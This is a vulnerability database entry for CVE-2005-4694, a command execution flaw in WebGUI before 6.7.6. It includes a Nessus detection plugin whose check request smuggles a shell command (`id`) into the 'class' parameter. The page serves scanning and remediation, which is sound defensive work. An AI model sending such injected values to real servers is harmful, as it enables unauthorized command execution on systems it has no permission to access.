Vulnerabilities > CVE-2005-4694

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
plain-black
nessus
NVD
Published: 2005-12-31
Updated: 2017-07-20

Summary

Unspecified vulnerability in the www_add method in Asset.pm in Plain Black WebGUI 6.3.0 and other versions before 6.7.6 allows attackers to execute arbitrary code via unknown attack vectors.

Vulnerable Configurations

Part Description Count
Application
Plain_Black
21

Nessus

NASL familyCGI abuses
NASL idWEBGUI_REMOTE_CMD_EXEC.NASL
descriptionThe remote host is running WebGUI, a content management system from Plain Black Software. The installed version of WebGUI on the remote host fails to sanitize user-supplied input via the
last seen2020-06-01
modified2020-06-02
plugin id20014
published2005-10-17
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/20014
titleWebGUI < 6.7.6 Asset.pm Asset Addition Arbitrary Code Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(20014);
  script_version("1.17");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_cve_id("CVE-2005-4694");
  script_bugtraq_id(15083);

  script_name(english:"WebGUI < 6.7.6 Asset.pm Asset Addition Arbitrary Code Execution");
  script_summary(english:"Checks for arbitrary remote command execution in WebGUI < 6.7.6");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that is prone to arbitrary
code execution.");
  script_set_attribute(attribute:"description", value:
"The remote host is running WebGUI, a content management system from
Plain Black Software. 

The installed version of WebGUI on the remote host fails to sanitize
user-supplied input via the 'class' variable to various sources before
using it to run commands.  By leveraging this flaw, an attacker may be
able to execute arbitrary commands on the remote host within the
context of the affected web server userid.");
   # http://web.archive.org/web/20070307175826/http://www.plainblack.com/getwebgui/advisories/security-exploit-patch-for-6.3-and-above
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?37c9ea6b");
  script_set_attribute(attribute:"solution", value:"Upgrade to WebGUI 6.7.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/10/17");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/10/12");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:plain_black:webgui");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");


http_check_remote_code_ka (
			check_request:"/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60;",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			extra_check:'<meta name="generator" content="WebGUI 6',
			command:"id"
			);

References